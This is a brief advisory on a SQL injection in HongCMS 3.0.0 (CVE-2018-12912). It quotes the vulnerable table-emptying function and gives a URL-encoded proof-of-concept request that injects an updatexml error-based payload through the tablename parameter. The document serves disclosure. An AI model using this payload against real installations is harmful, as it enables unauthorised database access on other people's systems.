HongCMS 3.0.0 – SQL Injection

Vulnerability file: admin\controllers\database.php

private function EmptyTable($tablename)
{
    $this->db->exe("DELETE FROM `$tablename`");
    $msg = '已完成清空数据库表: ' . $tablename . '<br/>';

    return $msg;
}

The $tablename parameter controllable.

POC (Administrator Privilege):

/admin/index.php/database/operate?dbaction=emptytable&tablename=hong_vvc%60%20where%20vvcid%3D1%20or%20updatexml%282%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20or%20%60

CVE:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12912
exploit-db:https://www.exploit-db.com/exploits/44953/